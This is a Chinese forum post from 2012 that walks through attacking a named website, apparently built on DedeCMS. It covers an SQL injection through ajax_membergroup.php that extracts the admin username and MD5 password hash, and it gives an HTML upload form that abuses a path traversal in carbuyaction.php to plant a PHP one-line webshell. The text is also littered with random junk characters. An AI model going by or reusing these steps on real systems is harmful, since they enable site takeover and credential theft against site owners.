①注入漏洞。
! O0 }5 u0 a1 I6 ]5 \这站 http://www.political-security.com/
v/ v5 o0 Z) F( {( W首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,0 f2 y: W- _0 E
www.political-security.com/data/mysql_error_trace.inc 爆后台. ~9 q; Z! m6 p% X9 Z0 q# R
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
: j3 M+ t$ k6 u5 V* i' S8 g, q然后写上语句
1 Z8 V& `% R7 ~; c( f, U$ z1 w查看管理员帐号
7 R* O7 k" W" c0 R$ K& x" T# shttp://www.political-security.co ... &membergroup=@`8 O- n% }* H9 o0 R0 O# J$ E
, Y9 K2 F8 `6 L! `admin
5 P5 a K2 b, x* r1 X/ A
/ |6 M0 i A% ~查看管理员密码
( }4 ?# V _3 Z% i http://www.political-security.co ... &membergroup=@`0 U7 u, n* X! j
* Z% `; m( y; Q1 p6 \# z
8d29b1ef9f8c5a5af429' Y4 H3 n( m4 p) p2 t. J
$ Y3 z4 ~& [- N( @. D+ T
查看管理员密码
# s+ e9 S: h, |; f
- h& k6 S& l' F4 X3 a$ l5 d- K得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD59 d1 I5 e7 Q A" C
; b7 s5 z. ~& U8d25 d( ]! t) W8 M
9b1ef9f8c5a5af42
4 T d' E2 M2 C0 b# @9
2 q1 O" f" _' t2 C8 _+ R) E& k* c# j
cmd5没解出来 只好测试第二个方法( h7 Z5 S5 `* A: B
J, f. N' I, f. i1 t- H$ ]* P( B' w
% I0 m0 x3 b+ m* p0 Y! Z8 n" I8 \②上传漏洞:- g2 B- D4 u0 n& ?7 X& l7 f) \) ~
; F; F: W! W+ z只要登陆会员中心,然后访问页面链接
! A$ @% c, s& O0 p“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
' l1 t; z9 ~* d1 Q- _- v. [. s, X' W/ n1 t: M' O# F s" J
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
6 N, Z( n' w5 ?4 @) E2 _$ ?- A
# D" `* y; X0 R9 i于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
% `* n {3 _3 U$ `: y) l0 K. K7 S% b+ t9 x
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
' F7 D2 `/ i3 d* S% i8 m# {& u或者
, v4 G! j0 C. I$ Q; R" |0 @) ^. [" }# B即可上传成功 |
发表于 2012-9-13 10:56:59
收藏
支持
反对